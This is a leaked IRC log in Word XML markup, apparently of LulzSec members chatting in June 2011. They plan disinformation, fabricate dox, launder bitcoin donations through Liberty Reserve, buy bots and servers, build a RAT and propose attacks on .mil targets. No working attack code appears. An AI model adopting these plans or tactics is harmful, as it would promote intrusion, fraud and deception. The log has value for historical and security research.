        <w:t>Jun 04 16:39:59 joepie91 lol Jun 04 16:40:01 joepie91 firefox raped it Jun 04 16:40:03 trollpoll is a disaster Jun 04 16:40:07 trollpoll xDD Jun 04 16:40:13 joepie91 there's a reason I use chromium-based browsers Jun 04 16:40:13 joepie91 lol Jun 04 16:40:23 trollpoll thank you Sabu Jun 04 16:40:23 joepie91 Firefox like, lagged it to death with 3 tabs open Jun 04 16:40:29 joepie91 in Iron I often have like 25 tabs open Jun 04 16:40:38 joepie91 and I never get above 80% of my RAM Jun 04 16:40:42 trollpoll 3 tabs... you are privileged xDDD Jun 04 16:40:46 joepie91 total RAM in that box is 384MB RAM Jun 04 16:40:59 trollpoll if i start iceweasel, i cant do anything else Jun 04 16:41:33 joepie91 so basically I am using at most 80% of my 384MB RAM Jun 04 16:41:33 joepie91 and that includes the OS itself, Iron/Chromium + Tinychat (flash video chat), Skype, Geany, local webserver stack with php/mysql, Streaming music Jun 04 16:41:40 joepie91 beat that. :D Jun 04 16:41:47 trollpoll thats the ram for!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:41:54 joepie91 my CPU is the bottleneck Jun 04 16:41:57 joepie91 Flash tends to fuck it up Jun 04 16:42:01 joepie91 and go 28.5 load avg Jun 04 16:42:02 trollpoll if you dont use, you ar wasting!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:42:03 joepie91 out of nowhere Jun 04 16:42:09 joepie91 I'm not even kidding Jun 04 16:42:13 joepie91 it literally goes up to 28.5 Jun 04 16:45:08 joepie91 so wait Jun 04 16:45:20 joepie91 you guys are claiming that lulzsec is a CIA op Jun 04 16:45:30 trollpoll sure Jun 04 16:45:31 joepie91 that Anonymous is working to uncover LulzSec Jun 04 16:45:35 trollpoll dont you think is cool?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:45:36 joepie91 that Adrian Lamo is at the head of it all Jun 04 16:45:41 joepie91 and people actually BELIEVE this shit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:45:46 trollpoll hahahaha Jun 04 16:45:50 joepie91 like, seriously Jun 04 16:45:51 joepie91 :| Jun 04 16:45:55 trollpoll counter information is usually better than information Jun 04 16:46:06 trollpoll as i was talking before Jun 04 16:46:20 trollpoll make the ppl think lulzsec is CIA group Jun 04 16:46:24 trollpoll makes sense even for me Jun 04 16:46:52 Topiary we're not claiming anything joepie, we're letting other people think things Jun 04 16:47:02 Topiary they are stupid Jun 04 16:47:06 Topiary real stupid Jun 04 16:47:11 trollpoll btw, what channels are u using?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:47:17 trollpoll 4chan? forums? chats?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:47:19 [redacted] its called mis-information Jun 04 16:47:20 [redacted] :] Jun 04 16:47:23 Topiary twitter.com/lulzsec Jun 04 16:47:24 [redacted] not counter information Jun 04 16:47:29 trollpoll lol Jun 04 16:47:53 trollpoll saying something like... "cmon, stop asking us, we are not CIA op" Jun 04 16:48:02 trollpoll is the best way to make the ppl think we are.. Jun 04 16:49:27 neuron do people think anonymous is after us?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:49:42 trollpoll i think so, but storm doesnt :P Jun 04 16:50:52 storm who has operator status Jun 04 16:50:56 storm to see ips Jun 04 16:51:23 pwnsauce storm wants to packet xD Jun 04 16:51:27 storm yup Jun 04 16:51:28 storm :D Jun 04 16:52:12 Topiary don't worry about Anon being after you fine folks Jun 04 16:52:20 Topiary they have no idea about anyone outside of their own circlejerk Jun 04 16:52:25 neuron :p im not worried Jun 04 16:52:36 joepie91 o_O Jun 04 16:52:38 joepie91 avast Jun 04 16:52:40 joepie91 now has a sandbox Jun 04 16:52:41 neuron lol what are thye gonna do launch there loic canons my way Jun 04 16:52:47 joepie91 as in, actual sandbox Jun 04 16:53:05 * joepie91 thinks that's the first free antivirus with a sandbox feature Jun 04 16:56:17 trollpoll joepie91, any console app for twitter? xD Jun 04 16:56:43 trollpoll ive downloaded the python api but i feel that is excesive to make my own client just for loling that night...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:56:58 joepie91 http://www.mactricksandtips.com/2009/01/tweeting- to-twitter-from-terminal.html Jun 04 16:57:00 neuron naw lol worth it :P Jun 04 16:57:16 trollpoll tnx Jun 04 16:57:35 * joepie91 GONNA BE GOOGLE-FU FIGHTINGGG Jun 04 16:57:58 neuron THOSE PACKETS WERE FAST AS LIGHTNING Jun 04 16:58:12 neuron THE QUERYS WERE A LITTLE BIT FRIGHTING...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:58:28 trollpoll hmm, is not a client, but.. it will work Jun 04 16:58:59 pwnsauce Sacre Bleu! Those SYN and ACK!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:59:11 joepie91 mk Jun 04 16:59:14 joepie91 inb4 I disconnect Jun 04 17:00:21 trollpoll damn, ctr+v in links2 paste... crtl+c closes... Jun 04 17:00:35 trollpoll fuuuuuu Jun 04 17:00:47 pwnsauce ctrl SHIFT c Jun 04 17:01:24 trollpoll late... but thanks!xD Jun 04 17:01:52 lol do not trust this swan Jun 04 17:02:20 joepie91 so Jun 04 17:02:24 joepie91 the HMA client Jun 04 17:02:26 joepie91 is practically Jun 04 17:02:28 joepie91 crashing my system Jun 04 17:02:28 trollpoll Jun 04 17:02:30 joepie91 \o/ Jun 04 17:02:44 neuron lmfao joepie91 it just calls openvpn Jun 04 17:03:08 joepie91 ya idk Jun 04 17:03:11 joepie91 tell that to the client Jun 04 17:03:49 joepie91 4-6-2011 23:03:30 : SENT CONTROL [server]: 'PUSH_REQUEST' (status=1) Jun 04 17:03:50 joepie91 after this Jun 04 17:03:54 joepie91 it just starts using an entire CPU core Jun 04 17:03:58 joepie91 crash shit Jun 04 17:04:01 joepie91 use more and more memory Jun 04 17:04:04 joepie91 and not connect to the VPN Jun 04 17:04:28 neuron do Jun 04 17:04:33 neuron ./hma "Spain, Madrid" Jun 04 17:04:39 joepie91 what Jun 04 17:04:42 joepie91 I'm on windows atm -_- Jun 04 17:04:48 neuron lmfao that explains it :P Jun 04 17:04:57 joepie91 eh.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:05:03 joepie91 ultravpn has never caused any issues.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:07:18 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 17:07:25 * joepie92 (joepie91@HA-864.t9g.4u7qps.IP) has joined #pure- elite Jun 04 17:07:29 joepie92 well Jun 04 17:07:33 joepie92 PPTP works Jun 04 17:07:37 joepie92 but OpenVPN, no bone Jun 04 17:07:55 neuron use pptp Jun 04 17:08:31 joepie92 mm Jun 04 17:08:41 pwnsauce joepie92 Jun 04 17:08:44 joepie92 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:08:47 pwnsauce how long should mtgox take Jun 04 17:08:52 pwnsauce to trnafer BTC to LR Jun 04 17:08:58 pwnsauce cos we transferred some Jun 04 17:09:00 joepie92 idk, I don't use LR Jun 04 17:09:02 pwnsauce and my balance is still 0 Jun 04 17:09:06 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 17:09:06 joepie92 I always do SEPA transfers Jun 04 17:09:10 * joepie92 is now known as joepie91 Jun 04 17:09:13 Topiary I sent you guys 2 BTC Jun 04 17:09:17 pwnsauce U5764978 Jun 04 17:09:25 pwnsauce that account is the one the LR needs to goto Jun 04 17:10:02 lol yeh might just take a while :) Jun 04 17:10:13 lol it went to mtgox and i sent to LR Jun 04 17:10:26 pwnsauce okey :D Il just keep checking :) Jun 04 17:10:45 neuron going from BTC to LR to USD?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:11:04 pwnsauce BTC -&gt; LR -&gt; Someone Elses LR i think Jun 04 17:11:23 sabu we need to own some serious bitcoins .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:12:18 pwnsauce aye Jun 04 17:12:20 pwnsauce Sabu Jun 04 17:12:23 pwnsauce ill PM Jun 04 17:14:14 storm we have 400+ in donations Jun 04 17:14:56 pwnsauce sheeeeet Jun 04 17:15:09 neuron lol dammn what are we gonna do with it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:15:09 joepie91 ok, now I mad Jun 04 17:15:15 joepie91 I have issues connecting to shit Jun 04 17:15:15 joepie91 :/ Jun 04 17:15:53 pwnsauce neuron - buy servers and bots Jun 04 17:16:27 Topiary already sent kayla money for bots, sending Sabu money for servers when he wants it Jun 04 17:16:30 Topiary we have 500USD in donations Jun 04 17:16:34 * tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure- elite Jun 04 17:17:28 trollpoll really i wonder how ppl supports lulzsec more than Anonymous...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:17:41 joepie91 that is what I have been wondering about Jun 04 17:17:42 joepie91 :/ Jun 04 17:18:03 trollpoll that makes you think...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:18:30 Topiary LESS THINKING MORE DRINKING!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:19:18 trollpoll hehe, i drink... beer without alcohol!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:19:31 trollpoll and grog Jun 04 17:20:59 joepie91 mk Jun 04 17:20:59 joepie91 so Jun 04 17:21:03 joepie91 OpNoPro says Jun 04 17:21:08 joepie91 that 2 of the people in the dox are correct at least Jun 04 17:21:11 joepie91 and he doesn't know about the others Jun 04 17:21:12 joepie91 :p Jun 04 17:21:21 joepie91 also, trollpoll: I drink beer without alcohol occasionally Jun 04 17:21:24 &lt;io&gt; hm in what fox?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:21:27 &lt;io&gt; dox* Jun 04 17:21:30 joepie91 http://pastebin.com/RBjzDQbS Jun 04 17:21:52 &lt;io&gt; wat? how can 2 are correct lulz Jun 04 17:22:11 joepie91 ohwell Jun 04 17:22:21 joepie91 I will just follow his lead Jun 04 17:22:21 joepie91 :D Jun 04 17:22:32 Avunit Theyre all true!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:22:33 Avunit damnit! D: Jun 04 17:22:38 &lt;io&gt; heh. HE MUST KNOW IT Jun 04 17:22:46 &lt;io&gt; HE IS BADASS KINDA_PSEUDO_EX_SPOOK Jun 04 17:22:48 &lt;io&gt; or something Jun 04 17:22:52 joepie91 also Jun 04 17:22:55 Topiary he most know that shit, kayla and I wrote those dox and we HATE LULZSEC FAGGOTS Jun 04 17:22:59 joepie91 people seem to actually believe Jun 04 17:23:04 joepie91 that it's a CIA op Jun 04 17:23:07 joepie91 to show how unsafe the internet is Jun 04 17:23:09 Topiary I know, it's brilliant Jun 04 17:23:12 joepie91 and put more restrictions in place Jun 04 17:23:13 joepie91 my god Jun 04 17:23:17 joepie91 you just tell some bullshit story Jun 04 17:23:23 joepie91 and people fill in the rest for you Jun 04 17:23:24 joepie91 :D Jun 04 17:23:25 &lt;io&gt; as if they would need any excuse Jun 04 17:23:29 &lt;io&gt; lol, they make just shit up Jun 04 17:23:32 neuron i want people to say were aliens!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:34 &lt;io&gt; and if in doubt, they use the CP hammer Jun 04 17:23:35 joepie91 io: that's exactly what I have been saying Jun 04 17:23:37 joepie91 to people who go Jun 04 17:23:43 joepie91 OMG YOU SHOULD NOT HACK FOR FREEDOM Jun 04 17:23:46 Topiary &lt;parr0t&gt; did he enjoy pay?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:47 Topiary &lt;whirlpool&gt; definitely; it's a lot of money Jun 04 17:23:47 Topiary &lt;jux&gt; who? what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:47 Topiary &lt;whirlpool&gt; Topiary Jun 04 17:23:47 Topiary &lt;parr0t&gt; 5000 wow Jun 04 17:23:47 Topiary &lt;whirlpool&gt; 7500, he wanted more Jun 04 17:23:47 joepie91 IT WILL ONLY MAKE THEM CLAMP DOWN HARDER Jun 04 17:23:49 Topiary &lt;whirlpool&gt; couldn't exactly say no Jun 04 17:23:51 Topiary &lt;parr0t&gt; LOL Jun 04 17:23:53 Topiary &lt;jux&gt; USD?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:54 &lt;io&gt; WE MUST RESTRICTS THE INTERNETZ. THERE IS CP AND TERROR.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:55 Topiary &lt;whirlpool&gt; yep Jun 04 17:23:57 Topiary &lt;jux&gt; what for?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:59 Topiary &lt;whirlpool&gt; private :D Jun 04 17:24:01 Topiary &lt;jux&gt; lol k Jun 04 17:24:03 Topiary this will mindfuck EVERYONE Jun 04 17:24:10 joepie91 yeah, because a government person really cares whether their site is down or not, in pushing a bill Jun 04 17:24:10 joepie91 also lol Jun 04 17:24:27 lol guys i dont think us being on tht irc is a good idea Jun 04 17:24:33 lol please dont follow any of their links Jun 04 17:24:36 joepie91 what IRC?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:24:38 lol they know what they're doing Jun 04 17:24:46 joepie91 ED?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:24:50 lol yeh Jun 04 17:27:02 joepie91 can you guys connect to kerpia.cryto.net ? Jun 04 17:27:02 joepie91 irc Jun 04 17:27:26 Topiary everyone leave ED IRC Jun 04 17:27:35 Topiary this is serious, military hackers trying to hack us Jun 04 17:27:37 Topiary don't stay there Jun 04 17:28:17 pwnsauce i propose Operation:/b/ackraid Jun 04 17:28:23 pwnsauce we need .mil targets Jun 04 17:29:12 storm how do you know Topiary?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:29:27 Topiary they were PMing us Jun 04 17:29:30 Topiary acting like trolls Jun 04 17:29:32 storm logs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:29:32 Topiary ask kayla Jun 04 17:29:38 Topiary kayla can you explain?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:29:46 storm please do.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:31:17 neuron lol: explain?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:31:19 lol look, those mil/fbi trolls are smart, everyone i talked to how claimed to be a hacker knows their shit and it not just pentesting shit i was going over scada which is like automation in machines and vulnerabilities and he was talking about clinet side attacks and shit they know what they're doing and you'd be a fool to think they're not there to pwn you Jun 04 17:31:52 lol we dont need to be on tht irc Jun 04 17:31:52 lol it's not safe Jun 04 17:32:00 sabu storm, quit with a ping timeout Jun 04 17:32:01 lol please just leave it Jun 04 17:32:05 neuron i think we should move to our newer irc Jun 04 17:32:06 storm I did?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:32:21 lol i really hope no one here has followed any of their links or opened any of their files Jun 04 17:32:29 Topiary don't think so Jun 04 17:32:39 storm i didnt Jun 04 17:32:42 neuron Im not in there and not oped so i didnt Jun 04 17:32:53 sabu ok Jun 04 17:33:02 sabu now that we had our public face the day Jun 04 17:33:06 sabu lets focus on our next moves Jun 04 17:33:25 sabu neuron what are you up to?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:33:28 lol everyone just leave tht server forget it exists Jun 04 17:33:39 neuron Sabu: me and pwnsauce are working on a nice RAT Jun 04 17:33:45 joepie91 k, so I can't find a route to host... to my own irc Jun 04 17:33:45 joepie91 wat do Jun 04 17:33:47 neuron that is my current focus Jun 04 17:34:09 neuron if im needed else were do tell Jun 04 17:34:10 lol most of them were talking really smarmy too like they had somethig on us Jun 04 17:34:28 lol if someone in this chan got owned we're all compromised now Jun 04 17:34:36 neuron 0-0\ Jun 04 17:34:45 sabu ok great Jun 04 17:34:53 neuron If you were on that chan and you opened a file. rm your box plox Jun 04 17:35:02 storm how do i make it look like i pinged?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:35:04 sabu neuron focus on the rat Jun 04 17:35:16 sabu /quit Ping timeout Jun 04 17:35:19 sabu rofl Jun 04 17:35:19 joepie91 storm Jun 04 17:35:19 joepie91 no Jun 04 17:35:22 joepie91 storm Jun 04 17:35:24 storm thats not a ping timeout Jun 04 17:35:25 storm lol Jun 04 17:35:27 joepie91 just literally pull your ethernet plug Jun 04 17:35:27 sabu hes already off Jun 04 17:35:29 storm thats jsut the reason Jun 04 17:35:30 [redacted] SO MUCH FOR OPSEC Jun 04 17:35:34 storm lol Jun 04 17:35:37 joepie91 literally pull your plug lol Jun 04 17:35:46 storm lol im not on from my home ip Jun 04 17:35:48 storm you doof Jun 04 17:35:50 storm i use shellz Jun 04 17:36:08 joepie91 ah, shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:36:09 joepie91 ye.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:36:10 joepie91 idk Jun 04 17:36:10 joepie91 lol Jun 04 17:36:30 joepie91 inb4 Ryan rages Jun 04 17:36:36 joepie91 and baleets fucking everyone Jun 04 17:37:10 Topiary Ryan needs a psychologist Jun 04 17:37:14 Topiary I will be his psychologist Jun 04 17:37:18 Topiary in return for bots Jun 04 17:37:20 joepie91 Topiary Jun 04 17:37:24 joepie91 don't start throwing chairs again Jun 04 17:37:25 joepie91 kthx Jun 04 17:37:27 joepie91 those things are expensive Jun 04 17:37:40 joepie91 like, seriously Jun 04 17:37:46 joepie91 you smashed a 300 euro chair on Barretts head Jun 04 17:37:47 joepie91 a few days ago Jun 04 17:37:48 joepie91 :| Jun 04 17:38:02 Topiary you're tripping me out bro Jun 04 17:38:06 joepie91 :D Jun 04 17:38:40 trollpoll sabu now that we had our public face the day &lt;--- lol bro Jun 04 17:38:46 joepie91 also Jun 04 17:38:53 joepie91 just saying Jun 04 17:38:58 joepie91 I read a blog post yesterday Jun 04 17:39:05 joepie91 that basically said LulzSec was a very good test to see Jun 04 17:39:09 joepie91 how anonymous Bitcoin really is Jun 04 17:39:15 neuron 0-0\ good point haha Jun 04 17:39:31 joepie91 tl;dr we are now lab rats Jun 04 17:39:32 tflow link?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:39:39 joepie91 lemme see if I can find it in my history Jun 04 17:39:45 * joepie91 opens way too many pages every day Jun 04 17:40:06 &lt;io&gt; yeah i read that too Jun 04 17:40:30 &lt;io&gt; http://techliberation.com/2011/06/03/bitcoin-silk-road- and-lulzsec-oh-my/ Jun 04 17:40:35 * lol has quit (Ping timeout: 121 seconds) Jun 04 17:40:42 tflow ah nice Jun 04 17:41:47 joepie91 fff Jun 04 17:41:54 joepie91 beat me to it Jun 04 17:41:55 joepie91 :( Jun 04 17:42:57 &lt;io&gt; joepie91google bitcoin lulzsec anonymous :p Jun 04 17:43:10 &lt;io&gt; faster than history heh Jun 04 17:43:22 joepie91 ye I did that Jun 04 17:43:26 joepie91 &gt;.&gt; Jun 04 17:43:58 &lt;io&gt; then you must type like my mom :D Jun 04 17:44:15 * trollpoll has quit (Ping timeout: 121 seconds) Jun 04 17:44:39 joepie91 notrly Jun 04 17:44:42 joepie91 lol Jun 04 17:44:46 joepie91 this vpn node sucks Jun 04 17:44:53 joepie91 I can't even connect to my own irc Jun 04 17:44:54 joepie91 :| Jun 04 17:45:01 joepie91 No route to host Jun 04 17:48:04 joepie91 this is almost scary Jun 04 17:48:11 joepie91 other person: I'm fapping, don't interrupt me Jun 04 17:48:16 joepie91 me: mk, cam, wanna see Jun 04 17:48:21 joepie91 other person: really? :o sec Jun 04 17:48:44 neuron wtf' Jun 04 17:49:29 * trollpoll (trollpoll@HA-9fh.11n.cc0br2.IP) has joined #pure-elite Jun 04 17:50:28 sabu joepie use the other vpn hosts Jun 04 17:50:37 storm halfdead is good pplz Jun 04 17:50:40 sabu youre telling me out the 80 vpn hosts hma has Jun 04 17:50:41 storm i see the pastebin Jun 04 17:50:46 sabu none of them connect?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:51:00 neuron storm: halfdead?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
